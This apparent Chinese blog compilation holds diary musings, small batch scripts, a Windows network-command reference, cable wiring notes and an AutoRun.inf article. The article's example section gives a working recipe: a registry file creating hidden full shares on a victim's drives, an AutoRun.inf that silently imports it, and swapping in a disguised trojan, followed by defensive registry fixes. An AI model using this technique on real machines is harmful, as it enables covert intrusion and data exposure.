也不知道是怎么了 

现在的我不愿再网络上流淌自己的真实的想法

写的都只是一些无聊在无聊的东西 

难道是在自我保护着什么 

知道在网络上几乎不存在什么秘密 

只要别人想知道

且有那个技术就一定能知道 

在次来到这里也不知道再写些什么

也知道来这的人几乎很少

也许都没人光顾了

呵呵

还是自己自娱自乐一下吧

将以为文本保存到记事本中,保存为 .bat 为后缀的文件.意为批处理文件.

@echo off
title 搜索
color 0a
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo    http://wlcol.blog.sohu.com
echo      By: wlcol
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
set a=
set/p a=请输入关键字....
start http://www.baidu.com/s?wd=%a%

如果你喜欢 www.google.com搜索的话,可以将www.baidu.com替换掉就可以了.

程序截图:

．bat　为windows系统批处理文件，批量执行windows系统命令．．

@echo off
title 结束系统进程
color 0a
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo    http://wlcol.blog.sohu.com
echo      By: wlcol
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 显示正在使用的系统进程
tasklist
set /p run=请输入要结束的程序名或PID号..
::ntsd -c q -pn %run%
taskkill /f /t /im %run%
pause>nul
exit

程序截图：

看到了流淌在网络上的文字

原以为一切都是那么美好

可天不随人愿

那一瞬

我的心痛了

一整天的关机让我明白了什么

也心碎了

没有想到会这样

一切的一切我都知道

可它来的太突然了

让我无法接受

...............

累了，该过去的就过去吧。
清风吹过、心随而逝！

--------------------------------------------------------------------------------

如果你玩过路由器的话，就知道路由器里面那些很好玩的命令缩写。 
例如，"sh int" 的意思是 "show interface"。
现在 Windows 2000 也有了类似界面的工具，叫做 netsh。

我们在 Windows 2000 的 cmd shell 下，输入 netsh
就出来：netsh> 提示符，
输入 int ip 就显示：
interface ip>
然后输入 dump ，我们就可以看到当前系统的网络配置：

# ----------------------------------
# Interface IP Configuration
# ----------------------------------
pushd interface ip

# Interface IP Configuration for "Local Area Connection"

set address name = "Local Area Connection" source = static addr = 192.168.1.168
mask = 255.255.255.0
add address name = "Local Area Connection" addr = 192.1.1.111 mask = 255.255.255.0
set address name = "Local Area Connection" gateway = 192.168.1.100 gwmetric = 1
set dns name = "Local Area Connection" source = static addr = 202.96.209.5
set wins name = "Local Area Connection" source = static addr = none

popd
# End of interface IP configuration

上面介绍的是通过交互方式操作的一种办法。
我们可以直接输入命令：
"netsh interface ip add address "Local Area Connection" 10.0.0.2
255.0.0.0"
来添加 IP 地址。

如果不知道语法，不要紧的哦！
在提示符下，输入 ? 就可以找到答案了。方便不方便啊？
原来微软的东西里面，也有那么一些让人喜欢的玩意儿。可惜，之至者甚少啊！

Windows网络命令行程序
这部分包括：

使用 ipconfig /all 查看配置
使用 ipconfig /renew 刷新配置
使用 ipconfig 管理 DNS 和 DHCP 类别 ID
使用 Ping 测试连接
使用 Arp 解决硬件地址问题
使用 nbtstat 解决 NetBIOS 名称问题
使用 netstat 显示连接统计
使用 tracert 跟踪网络连接
使用 pathping 测试路由器
使用 ipconfig /all 查看配置
发现和解决 TCP/IP 网络问题时，先检查出现问题的计算机上的 TCP/IP 配置。可以
使用 ipconfig 命令获得主机配置信息，包括 IP 地址、子网掩码和默认网关。

注意

对于 Windows 95 和 Windows 98 的客户机，请使用 winipcfg 命令而不是 ipconfi
g 命令。
使用带 /all 选项的 ipconfig 命令时，将给出所有接口的详细配置报告，包括任何
已配置的串行端口。使用 ipconfig /all，可以将命令输出重定向到某个文件，并将
输出粘贴到其他文档中。也可以用该输出确认网络上每台计算机的 TCP/IP 配置，或
者进一步调查 TCP/IP 网络问题。

例如，如果计算机配置的 IP 地址与现有的 IP 地址重复，则子网掩码显示为 0.0.0
.0。

下面的范例是 ipconfig /all 命令输出，该计算机配置成使用 DHCP 服务器动态配置
TCP/IP，并使用 WINS 和 DNS 服务器解析名称。

Windows 2000 IP Configuration

Node Type.. . . . . . . . : Hybrid
IP Routing Enabled.. . . . : No
WINS Proxy Enabled.. . . . : No

Ethernet adapter Local Area Connection:

Host Name.. . . . . . . . : corp1.microsoft.com
DNS Servers . . . . . . . : 10.1.0.200
Description. . . . . . . : 3Com 3C90x Ethernet Adapter
Physical Address. . . . . : 00-60-08-3E-46-07
DHCP Enabled.. . . . . . . : Yes
Autoconfiguration Enabled.: Yes
IP Address. . . . . . . . . : 192.168.0.112
Subnet Mask. . . . . . . . : 255.255.0.0
Default Gateway. . . . . . : 192.168.0.1
DHCP Server. . . . . . . . : 10.1.0.50
Primary WINS Server. . . . : 10.1.0.101
Secondary WINS Server. . . : 10.1.0.102
Lease Obtained.. . . . . . : Wednesday, September 02, 1998 10:32:13 AM
Lease Expires.. . . . . . : Friday, September 18, 1998 10:32:13 AM

如果 TCP/IP 配置没有问题，下一步测试能够连接到 TCP/IP 网络上的其他主机。

使用 ipconfig /renew 刷新配置
解决 TCP/IP 网络问题时，先检查遇到问题的计算机上的 TCP/IP 配置。如果计算机
启用 DHCP 并使用 DHCP 服务器获得配置，请使用 ipconfig /renew 命令开始刷新租
约。

使用 ipconfig /renew 时，使用 DHCP 的计算机上的所有网卡（除了那些手动配置的
适配器）都尽量连接到 DHCP 服务器，更新现有配置或者获得新配置。

也可以使用带 /release 选项的 ipconfig 命令立即释放主机的当前 DHCP 配置。有
关 DHCP 和租用过程的详细信息，请参阅客户机如何获得配置。

注意

对于启用 DHCP 的 Windows 95 和 Windows 98 客户，请使用 winipcfg 命令的 rel
ease 和 renew 选项，而不是 ipconfig /release 和 ipconfig /renew 命令，手动
释放或更新客户的 IP 配置租约。
使用 ipconfig 管理 DNS 和 DHCP 类别 ID
也可以使用 ipconfig 命令：

显示或重置 DNS 缓存。
详细信息，请参阅使用 ipconfig 查看或重置客户解析程序缓存。

刷新已注册的 DNS 名称。
详细信息，请参阅使用 ipconfig 更新 DNS 客户注册。

显示适配器的 DHCP 类别 ID。
详细信息，请参阅显示客户机上的 DHCP 类别 ID 信息。

设置适配器的 DHCP 类别 ID。
详细信息，请参阅设置客户机上的 DHCP 类别 ID 信息。

使用 Ping 测试连接
Ping 命令有助于验证 IP 级的连通性。发现和解决问题时，可以使用 Ping 向目标主
机名或 IP 地址发送 ICMP 回应请求。需要验证主机能否连接到 TCP/IP 网络和网络
资源时，请使用 Ping。也可以使用 Ping 隔离网络硬件问题和不兼容配置。

通常最好先用 Ping 命令验证本地计算机和网络主机之间的路由是否存在，以及要连
接的网络主机的 IP 地址。Ping 目标主机的 IP 地址看它是否响应，如下：

ping IP_address

使用 Ping 时应该执行以下步骤：

Ping 环回地址验证是否在本地计算机上安装 TCP/IP 以及配置是否正确。
ping 127.0.0.1

Ping 本地计算机的 IP 地址验证是否正确地添加到网络。
ping IP_address_of_local_host

Ping 默认网关的 IP 地址验证默认网关是否运行以及能否与本地网络上的本地主机通
讯。
ping IP_address_of_default_gateway

Ping 远程主机的 IP 地址验证能否通过路由器通讯。
ping IP_address_of_remote_host

Ping 命令用 Windows 套接字样式的名称解析将计算机名解析成 IP 地址，所以如果
用地址成功，但是用名称 Ping 失败，则问题出在地址或名称解析上，而不是网络连
通性的问题。详细信息，请参阅使用 Arp 解决硬件地址问题。

如果在任何点上都无法成功地使用 Ping，请确认：

安装和配置 TCP/IP 之后重新启动计算机。
“Internet 协议 (TCP/IP) 属性”对话框“常规”选项卡上的本地计算机的 IP 地址
有效而且正确。
启用 IP 路由，并且路由器之间的链路是可用的。
您可以使用 Ping 命令的不同选项来指定要使用的数据包大小、要发送多少数据包、
是否记录用过的路由、要使用的生存时间 (TTL) 值以及是否设置“不分段”标志。可
以键入 ping -? 查看这些选项。

下例说明如何向 IP 地址 172.16.48.10 发送两个 Ping，每个都是 1,450 字节：

C:>ping -n 2 -l 1450 172.16.48.10
Pinging 172.16.48.10 with 1450 bytes of data:

Reply from 172.16.48.10:bytes=1450 time<10ms TTL=32
Reply from 172.16.48.10:bytes=1450 time<10ms TTL=32

Ping statistics for 157.59.8.1:
Packets:Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate roundtrip times in milli-seconds:
Minimum = 0ms, Maximum = 10ms, Average = 2ms
默认情况下，在显示“请求超时”之前，Ping 等待 1,000 毫秒（1 秒）的时间让每
个响应返回。如果通过 Ping 探测的远程系统经过长时间延迟的链路，如卫星链路，
则响应可能会花更长的时间才能返回。可以使用 -w （等待）选项指定更长时间的超
时。

使用 Arp 解决硬件地址问题
“地址解析协议 (ARP)”允许主机查找同一物理网络上的主机的媒体访问控制地址，
如果给出后者的 IP 地址。为使 ARP 更加有效，每个计算机缓存 IP 到媒体访问控制
地址映射消除重复的 ARP 广播请求。

可以使用 arp 命令查看和修改本地计算机上的 ARP 表项。arp 命令对于查看 ARP 缓
存和解决地址解析问题非常有用。

详细信息，请参阅查看“地址解析协议 (ARP)”缓存和添加静态 ARP 缓存项目。

使用 nbtstat 解决 NetBIOS 名称问题
TCP/IP 上的 NetBIOS (NetBT) 将 NetBIOS 名称解析成 IP 地址。TCP/IP 为 NetBI
OS 名称解析提供了很多选项，包括本地缓存搜索、WINS 服务器查询、广播、DNS 服
务器查询以及 Lmhosts 和主机文件搜索。

Nbtstat 是解决 NetBIOS 名称解析问题的有用工具。可以使用 nbtstat 命令删除或
更正预加载的项目：

nbtstat -n 显示由服务器或重定向器之类的程序在系统上本地注册的名称。
nbtstat -c 显示 NetBIOS 名称缓存，包含其他计算机的名称对地址映射。
nbtstat -R 清除名称缓存，然后从 Lmhosts 文件重新加载。
nbtstat -RR 释放在 WINS 服务器上注册的 NetBIOS 名称，然后刷新它们的注册。
nbtstat -a name 对 name 指定的计算机执行 NetBIOS 适配器状态命令。适配器状态
命令将返回计算机的本地 NetBIOS 名称表，以及适配器的媒体访问控制地址。
nbtstat -S 列出当前的 NetBIOS 会话及其状态（包括统计），如下例所示：
NetBIOS connection table

Local name State In/out Remote Host Input Output
------------------------------------------------------------------
CORP1 <00> Connected Out CORPSUP1<20> 6MB 5MB
CORP1 <00> Connected Out CORPPRINT<20> 108KB 116KB
CORP1 <00> Connected Out CORPSRC1<20> 299KB 19KB
CORP1 <00> Connected Out CORPEMAIL1<20> 324KB 19KB
CORP1 <03> Listening
使用 netstat 显示连接统计
可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令
将显示所有连接，而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示
Ethernet 统计信息，而 netstat -s 显示每个协议的统计信息。如果使用 netstat
-n，则不能将地址和端口号转换成名称。下面是 netstat 的输出示例：

C:>netstat -e
Interface Statistics

Received Sent
Bytes 3995837940 47224622
Unicast packets 120099 131015
Non-unicast packets 7579544 3823
Discards 0 0
Errors 0 0
Unknown protocols 363054211

C:>netstat -a

Active Connections

Proto Local Address Foreign Address State
TCP CORP1:1572 172.16.48.10:nbsession ESTABLISHED
TCP CORP1:1589 172.16.48.10:nbsession ESTABLISHED
TCP CORP1:1606 172.16.105.245:nbsession ESTABLISHED
TCP CORP1:1632 172.16.48.213:nbsession ESTABLISHED
TCP CORP1:1659 172.16.48.169:nbsession ESTABLISHED
TCP CORP1:1714 172.16.48.203:nbsession ESTABLISHED
TCP CORP1:1719 172.16.48.36:nbsession ESTABLISHED
TCP CORP1:1241 172.16.48.101:nbsession ESTABLISHED
UDP CORP1:1025 *:*
UDP CORP1:snmp *:*
UDP CORP1:nbname *:*
UDP CORP1:nbdatagram *:*
UDP CORP1:nbname *:*
UDP CORP1:nbdatagram *:*

C:>netstat -s
IP Statistics

Packets Received = 5378528
Received Header Errors = 738854
Received Address Errors = 23150
Datagrams Forwarded = 0
Unknown Protocols Received = 0
Received Packets Discarded = 0
Received Packets Delivered = 4616524
Output Requests = 132702
Routing Discards = 157
Discarded Output Packets = 0
Output Packet No Route = 0
Reassembly Required = 0
Reassembly Successful = 0
Reassembly Failures =
Datagrams Successfully Fragmented = 0
Datagrams Failing Fragmentation = 0
Fragments Created = 0

ICMP Statistics
Received Sent
Messages 693 4
Errors 0 0
Destination Unreachable 685 0
Time Exceeded 0 0
Parameter Problems 0 0
Source Quenches 0 0
Redirects 0 0
Echoes 4 0
Echo Replies 0 4
Timestamps 0 0
Timestamp Replies 0 0
Address Masks 0 0
Address Mask Replies 0 0

TCP Statistics

Active Opens = 597
Passive Opens = 135
Failed Connection Attempts = 107
Reset Connections = 91
Current Connections = 8
Segments Received = 106770
Segments Sent = 118431
Segments Retransmitted = 461

UDP Statistics

Datagrams Received = 4157136
No Ports = 351928
Receive Errors = 2
Datagrams Sent = 13809

使用 tracert 跟踪网络连接
Tracert（跟踪路由）是路由跟踪实用程序，用于确定 IP 数据报访问目标所采取的路
径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到
网络上其他主机的路由。

Tracert 工作原理
通过向目标发送不同 IP 生存时间 (TTL) 值的“Internet 控制消息协议 (ICMP)”回
应数据包，Tracert 诊断程序确定到目标所采取的路由。要求路径上的每个路由器在
转发数据包之前至少将数据包上的 TTL 递减 1。数据包上的 TTL 减为 0 时，路由器
应该将“ICMP 已超时”的消息发回源系统。

Tracert 先发送 TTL 为 1 的回应数据包，并在随后的每次发送过程将 TTL 递增 1，
直到目标响应或 TTL 达到最大值，从而确定路由。通过检查中间路由器发回的“ICM
P 已超时”的消息确定路由。某些路由器不经询问直接丢弃 TTL 过期的数据包，这在
Tracert 实用程序中看不到。

Tracert 命令按顺序打印出返回“ICMP 已超时”消息的路径中的近端路由器接口列表
。如果使用 -d 选项，则 Tracert 实用程序不在每个 IP 地址上查询 DNS。

在下例中，数据包必须通过两个路由器（10.0.0.1 和 192.168.0.1）才能到达主机
172.16.0.99。主机的默认网关是 10.0.0.1，192.168.0.0 网络上的路由器的 IP 地
址是 192.168.0.1。

C:>tracert 172.16.0.99 -d
Tracing route to 172.16.0.99 over a maximum of 30 hops
1 2s 3s 2s 10,0.0,1
2 75 ms 83 ms 88 ms 192.168.0.1
3 73 ms 79 ms 93 ms 172.16.0.99
Trace complete.
用 tracert 解决问题
可以使用 tracert 命令确定数据包在网络上的停止位置。下例中，默认网关确定 19
2.168.10.99 主机没有有效路径。这可能是路由器配置的问题，或者是 192.168.10.
0 网络不存在（错误的 IP 地址）。

C:>tracert 192.168.10.99

Tracing route to 192.168.10.99 over a maximum of 30 hops

1 10.0.0.1 reports:Destination net unreachable.

Trace complete.

Tracert 实用程序对于解决大网络问题非常有用，此时可以采取几条路径到达同一个
点。

Tracert 命令行选项
Tracert 命令支持多种选项，如下表所示。

tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

选项 描述
-d 指定不将 IP 地址解析到主机名称。
-h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。
-j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。
-w timeout 等待 timeout 为每次回复所指定的毫秒数。
target_name 目标主机的名称或 IP 地址。

详细信息，请参阅使用 tracert 命令跟踪路径。

使用 pathping 测试路由器
pathping 命令是一个路由跟踪工具，它将 ping 和 tracert 命令的功能和这两个工
具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最
终目标的路径上的每个路由器，然后基于数据包的计算机结果从每个跃点返回。由于
命令显示数据包在任何给定路由器或链接上丢失的程度，因此可以很容易地确定可能
导致网络问题的路由器或链接。某些选项是可用的，如下表所示。

选项 名称 功能
-n Hostnames 不将地址解析成主机名。
-h Maximum hops 搜索目标的最大跃点数。
-g Host-list 沿着路由列表释放源路由。
-p Period 在 ping 之间等待的毫秒数。
-q Num_queries 每个跃点的查询数。
-w Time-out 为每次回复所等待的毫秒数。
-T Layer 2 tag 将第 2 层优先级标记（例如，对于 IEEE 802.1p）连接到数据包并
将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络
设备。-T 开关用于测试服务质量 (QoS) 连通性。
-R RSVP test Che检查以确定路径中的每个路由器是否支持“资源保留协议 (RSVP)”
，此协议允许主机为数据流保留一定量的带宽。 -R 开关用于测试服务质量 (QoS) 连
通性。

默认的跃点数是 30，并且超时前的默认等待时间是 3 秒。默认时间是 250 毫秒，并
且沿着路径对每个路由器进行查询的次数是 100。

以下是典型的 pathping 报告。跃点列表后所编辑的统计信息表明在每个独立路由器
上数据包丢失的情况。

D:>pathping -n msw

Tracing route to msw [7.54.1.196]
over a maximum of 30 hops:
0 172.16.87.35
1 172.16.87.218
2 192.68.52.1
3 192.68.80.1
4 7.54.247.14
5 7.54.1.196

Computing statistics for 125 seconds...
Source to Here This Node/Link
Hop RTT Lost/Sent = Pct Lost/Sent = Pct Address
0 172.16.87.35
0/ 100 = 0% |
1 41ms 0/ 100 = 0% 0/ 100 = 0% 172.16.87.218
13/ 100 = 13% |
2 22ms 16/ 100 = 16% 3/ 100 = 3% 192.68.52.1
0/ 100 = 0% |
3 24ms 13/ 100 = 13% 0/ 100 = 0% 192.68.80.1
0/ 100 = 0% |
4 21ms 14/ 100 = 14% 1/ 100 = 1% 10.54.247.14
0/ 100 = 0% |
5 24ms 13/ 100 = 13% 0/ 100 = 0% 10.54.1.196

Trace complete.

当运行 pathping 时，在测试问题时首先查看路由的结果。此路径与 tracert 命令所
显示的路径相同。然后 pathping 命令对下一个 125 毫秒显示忙消息（此时间根据跃
点计数变化）。在此期间，pathping 从以前列出的所有路由器和它们之间的链接之间
收集信息。在此期间结束时，它显示测试结果。

最右边的两栏 This Node/Link Lost/Sent=Pct 和 Address 包含的信息最有用。172
.16.87.218（跃点 1）和 192.68.52.1（跃点 2）丢失 13% 的数据包。 所有其他链
接工作正常。在跃点 2 和 4 中的路由器也丢失寻址到它们的数据包（如 This Node
/Link 栏中所示），但是该丢失不会影响转发的路径。

对链接显示的丢失率（在最右边的栏中标记为 |）表明沿路径转发丢失的数据包。该
丢失表明链接阻塞。对路由器显示的丢失率（通过最右边栏中的 IP 地址显示）表明
这些路由器的 CPU 可能超负荷运行。这些阻塞的路由器可能也是端对端问题的一个因
素，尤其是在软件路由器转发数据包时。

另一头（从左到右）：橙白、橙、绿白、蓝、蓝白、绿、棕白、棕。

直通线的顺序：
两头一样(从左到右)：绿白、绿、橙白、蓝、蓝白、橙、棕白、棕
          或者两头全是：橙白、橙、绿白、蓝、蓝白、绿、棕白、棕。

使用直通线的情况：
1. 将交换机或HUB与路由器连接；
2. 计算机（包括服务器和工作站）与交换机或HUB连接。

使用交叉线的情况：
1． 交换机与交换机之间通过UPLINKS口连接；
2． HUB与交换机连接；
3． HUB与HUB之间连接；
4． 两台PC直接相连(网卡对网卡)；
5． 路由器接口与其它路由器接口的连接；
6． Ethernet接口的ADSL Modem连接到PC机的网卡接口。

简单点就是说，同一层设备相连用交叉线，不同一层设备相连用直连线。
或者说，如果两个端口的类型相同，就使用交叉线；如果两个端口类型不同，则使用直连线。

至于两台计算机直接相连后的设置:

用正确的网线连好以后,自动获取IP也可以,配置一下家庭网络向导

或者把两台机器的IP分别设置成:192.168.0.1和192.168.0.2(类似即可) 就可以传数据了。

★ 如果是双机直联，必须使用交叉网线（实际上就是1236四根线交叉），实际上电信ADSL所提供的那根网线就是这种网线，其两头的排列方式分别为：
　　1 2 3 4 5 6 7 8
　　3 6 1 4 5 2 7 8
　　如果是使用简易网线测量仪，其灯跳顺序应为：12→45→78→36→12，下面更详细的再说一遍：
　　一端： 白橙／橙／白绿／蓝／白蓝／绿／白棕／棕（12345678） 1 2 3 4 5 6 7 8
　　一端： 白绿／绿／白橙／蓝／白蓝／橙／白棕／棕（36145278） 3 6 1 4 5 2 7 8
　　你也可以把4578四根线也交叉，即：
　　1 2 3 4 5 6 7 8
　　3 6 1 7 8 2 4 5

一、理论基础

经常使用光盘的朋友都知道，有很多光盘放入光驱就会自动运行，它们是怎么做的呢？光盘一放入光驱就会自动被执行，主要依靠两个文件，一是光盘上的AutoRun.inf文件，另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作，如果有的话，便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。

AutoRun.inf不光能让光盘自动运行程序，也能让硬盘自动运行程序，方法很简单，先打开记事本，然后用鼠标右键点击该文件，在弹出菜单中选择“重命名”，将其改名为AutoRun.inf，在AutoRun.inf中键入以下内容：

[AutoRun]　　　　//表示AutoRun部分开始，必须输入

Icon=C:\C.ico　　//给C盘一个个性化的盘符图标C.ico

Open=C:\1.exe　　//指定要运行程序的路径和名称，在此为C盘下的1.exe

保存该文件，按F5刷新桌面，再看“我的电脑”中的该盘符(在此为C盘)，你会发现它的磁盘图标变了，双击进入C盘，还会自动播放C盘下的1.exe文件！

解释一下：“[AutoRun]”行是必须的固定格式，“Icon”行对应的是图标文件，“C:\C.ico”为图标文件路径和文件名，你在输入时可以将它改为你的图片文件所在路径和文件名。另外，“.ico”为图标文件的扩展名，如果你手头上没有这类文件，可以用看图软件ACDSee将其他格式的软件转换为ico格式，或者找到一个后缀名为BMP的文件，将它直接改名为ICO文件即可。

“Open”行指定要自动运行的文件及其盘符和路径。要特别说明的是，如果你要改变的硬盘跟目录下没有自动播放文件，就应该把“OPEN”行删掉，否则就会因为找不到自动播放文件而打不开硬盘，此时只能用鼠标右键单击盘符在弹出菜单中选“打开”才行。

请大家注意：保存的文件名必须是“AutoRun.inf”，编制好的Autorun.inf文件和图标文件一定要放在硬盘根目录下。更进一步，如果你的某个硬盘内容暂时比较固定的话，不妨用Flash做一个自动播放文件，再编上“Autorun”文件，那你就有最酷、最个性的硬盘了。

到这儿还没有完。大家知道，在一些光盘放入后，我们在其图标上单击鼠标右键，还会产生一个具有特色的目录菜单，如果能对着我们的硬盘点击鼠标右键也产生这样的效果，那将更加的有特色。其实，光盘能有这样的效果也仅仅是因为在AutoRun.inf文件中有如下两条语句：

shell\标志＝显示的鼠标右键菜单中内容

shell\标志\command＝要执行的文件或命令行

所以，要让硬盘具有特色的目录菜单，在AutoRun.inf文件中加入上述语句即可，示例如下：

shell\1=天若有情天亦老

shell\1\command\=notepad ok.txt

保存完毕，按F5键刷新，然后用鼠标右键单击硬盘图标，在弹出菜单中会发现“天若有情天亦老”，点击它，会自动打开硬盘中的“ok.txt”文件。注意：上面示例假设“ok.txt”文件在硬盘根目录下，notepad为系统自带的记事本程序。如果要执行的文件为直接可执行程序，则在“command\”后直接添加该执行程序文件名即可。

二、实例

下面就举个例子：如果你扫到一台开着139共享的机器，而对方只完全共享了D盘，我们要让对方的所有驱动器都共享。首先编辑一个注册表文件，打开记事本，键入以下内容：

REGEDIT4
'此处一定要空一行
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="C:"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="E:"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:

以上我只设置到E盘，如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写，其后要空上一行，在最后一行记得要按一次回车键。

然后打开记事本，编制一个AutoRun.inf文件，键入以下内容：

[AutoRun]
Open=regedit/s Share.reg   //加/s参数是为了导入时不会显示任何信息

保存AutoRun.inf文件。将Share.reg和AutoRun.inf这两个文件都复制到对方的D盘的根目录下，这样对方只要双击D盘就会将Share.reg导入注册表，这样对方电脑重启后所有驱动器就会都完全共享出来。

如果想让对方中木马，只要在AutoRun.inf文件中，把“Open=Share.Reg”改成“Open=木马服务端文件名”，然后把AutoRun.inf和配置好的木马服务端一起复制到对方D盘的根目录下，这样不需对方运行木马服务端程序，而只需他双击D盘就会使木马运行！这样做的好处显而易见，那就是大大的增加了木马运行的主动性！须知许多人现在都是非常警惕的，不熟悉的文件他们轻易的不会运行，而这种方法就很难防范了。

要说明的是，给你下木马的人不会那么蠢的不给木马加以伪装，一般说来，他们会给木马服务端文件改个名字，或好听或和系统文件名很相像，然后给木马换个图标，使它看起来像TXT文件、ZIP文件或图片文件等，，最后修改木马的资源文件使其不被杀毒软件识别（具体的方法可以看本刊以前的文章），当服务端用户信以为真时，木马却悄悄侵入了系统。其实，换个角度理解就不难了——要是您给别人下木马我想你也会这样做的。以上手段再辅以如上内容的AutoRun.inf文件就天衣无缝了！

三、防范方法

共享分类完全是由flags标志决定的，它的键值决定了共享目录的类型。当flags=0x302时，重新启动系统，目录共享标志消失，表面上看没有共享，实际上该目录正处于完全共享状态。网上流行的共享蠕虫，就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402，就可以看到硬盘被共享了，明白了吗？秘密就在这里！

以上代码中的Parmlenc、Parm2enc属性项是加密的密码，系统在加密时采用了8位密码分别与“35 9a 4b a6 53 a9 d4 6a”进行异或运算，要想求出密码再进行一次异或运算，然后查ASCII表可得出目录密码。在网络软件中有一款软件就利用该属性进行网络密码破解的，在局域网内从一台机器上可以看到另一台计算机的共享密码。

利用TCP/IP协议设计的NethackerⅡ软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。

解决办法是把

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan

下面的“C$”、“D$”、“E$”等删掉。然后删除windows\system\下面的Vserver.vxd删除，它是Microsoft网络上的文件与打印机共享虚拟设备驱动程序，再把

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\

下的Vserver键值删掉，就会很安全了。

另外，关闭硬盘AutoRun功能也是防范黑客入侵的有效方法之一。具体方法是在“开始”菜单的“运行”中输入Regedit，打开注册表编辑器，展开到

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer

主键下，在右侧窗格中找到“NoDriveTypeAutoRun”，就是这个键决定了是否执行CDROM或硬盘的AutoRun功能。

双击“NoDriveTypeAutoRun”，在默认状态下（即你没有禁止过AutoRun功能），在弹出窗口中可以看到“NoDriveTypeAutoRun”默认键值为95,00,00,00。其中第一个值“95”是十六进制值，它是所有被禁止自动运行设备的和。将“95”转为二进制就是10010101，其中每位代表一个设备，Windows中不同设备会用如下数值表示：

设备名称　　　　 第几位 值 设备用如下数值表示  设备名称含义
DKIVE_UNKNOWN　　  0　　1　　01h　　　　　　   不能识别的设备类型
DRIVE_NO_ROOT_DIR  1　　0　　02h　　　　　　   没有根目录的驱动器(Drive without root 　
　　　　　　　　　　　　　　　　　　　　　　　 directory) 
DRIVE_REMOVABLE　　2　　1　　04h　　　　　　   可移 动驱动器(Removable drive)
DRIVE_FIXED　　　　3　　0　　08h　　　　　　   固定的驱动器(Fixed drive)  
DRIVE_REMOTE　　   4　　1　　10h　　　　　　   网络驱动器(Network drive)
DRIVE_CDROM　　　　5　　0　　20h　　　　　　   光驱(CD-ROM)　　
DRIVE_RAMDISK　　  6　　0　　40h　　　　　　   RAM磁盘(RAM Disk) 
保留　　　　　　   7　　1　　80h　　　　　　   未指定的驱动器类型(Not yet 
                                               specified drive disk)

在上面所列的表中值为“0”表示设备运行，值为“1”表示该设备不运行（默认情况下，Windows禁止80h、10h、4h、01h这些设备自动运行，这些数值累加正好是十六进制的95h，所以NoDriveTypeAutoRun”默认键值为95,00,00,00）。

由上面的分析不难看出，在默认情况下，会自动运行的设备是DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK这四个保留设备，所以要禁止硬盘自动运行AutoRun.inf文件，就必须将DRIVE_FIXED的值设为1，这是因为DRIVE_FIXED代表固定的驱动器，即硬盘。这样一来，原来的10010101（在表中“值”列中由下向上看）就变成了二进制的10011101，转为十六进制为9D。现在，将“NoDriveTypeAutoRun”的键值改为9D,00,00,00后关闭注册表编辑器，重启电脑后就会关闭硬盘的AutoRun功能。

如果你看明白了，那你肯定知道该怎样禁止光盘AutoRun功能了，对！就是将DRIVE_CDROM设为1，这样“NoDriveTypeAutoRun”键值中的第一个值就变成了10110101，也就是十六进制的B5。将第一个值改为B5后关闭注册表编辑器，重启电脑后就会关闭CDROM的Autorun功能。如果仅想禁止软件光盘的AutoRun功能，但又保留对CD音频碟的自动播放能力，这时只需将“NoDriveTypeAutoRun”的键值改为：BD,00,00,00即可。

如果想要恢复硬盘或光驱的AutoRun功能，进行反方向操作即可。

事实上，大多数的硬盘根目录下并不需要AutoRun.inf文件来运行程序，因此我们完全可以将硬盘的AutoRun功能关闭，这样即使在硬盘根目录下有AutoRun.inf这个文件，Windows也不会去运行其中指定的程序，从而可以达到防止黑客利用AutoRun.inf文件入侵的目的。

除此以外，我们还应让Windows能显示出隐藏的共享。大家都知道，在Windows 9X中设置共享时，通过在共享名后加上“$”这个符号，可使共享隐藏。比如，我们给一个名为share的计算机的C盘设置共享时，只要将其共享名设为C$。这样我们将看不到被共享的C盘，只有通过输入该共享的确切路径，才能访问此共享。不过我们只要用将电脑中的msnp32.dll文件稍做修改。就可以让Windows显示出隐藏的共享。

